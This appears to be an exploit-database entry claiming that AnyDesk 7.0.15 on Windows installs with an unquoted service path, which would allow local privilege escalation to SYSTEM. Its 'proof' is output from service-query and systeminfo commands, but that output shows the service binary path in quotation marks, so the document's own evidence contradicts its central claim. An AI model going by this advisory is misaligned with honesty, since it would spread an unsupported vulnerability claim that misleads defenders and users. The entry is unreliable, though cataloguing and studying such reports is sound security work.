034fafa3fd
8 changes to exploits/shellcodes/ghdb Positron Broadcast Signal Processor TRA7005 v1.20 - Authentication Bypass Best Student Result Management System v1.0 - Multiple SQLi Daily Expense Manager 1.0 - 'term' SQLi Human Resource Management System v1.0 - Multiple SQLi Open Source Medicine Ordering System v1.0 - SQLi Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload AnyDesk 7.0.15 - Unquoted Service Path
40 lines
No EOL
1.2 KiB
Text
40 lines
No EOL
1.2 KiB
Text
# Exploit Title: AnyDesk 7.0.15 - Unquoted Service Path
|
|
# Date: 2024-04-01
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# Vendor Homepage: http://anydesk.com
|
|
# Software Link: http://anydesk.com/download
|
|
# Version: Software Version 7.0.15
|
|
# Tested on: Windows 10 Pro x64
|
|
|
|
1. Description:
|
|
|
|
The Anydesk installs as a service with an unquoted service path running
|
|
with SYSTEM privileges.
|
|
This could potentially allow an authorized but non-privileged local
|
|
user to execute arbitrary code with elevated privileges on the system.
|
|
|
|
2. Proof
|
|
|
|
C:\>sc qc anydesk
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: anydesk
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe"
|
|
--service
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : AnyDesk Service
|
|
DEPENDENCIES : RpcSs
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
|
|
C:\>systeminfo
|
|
|
|
OS Name: Microsoft Windows 10 Pro
|
|
OS Version: 10.0.19045 N/A Build 19045
|
|
OS Manufacturer: Microsoft Corporation |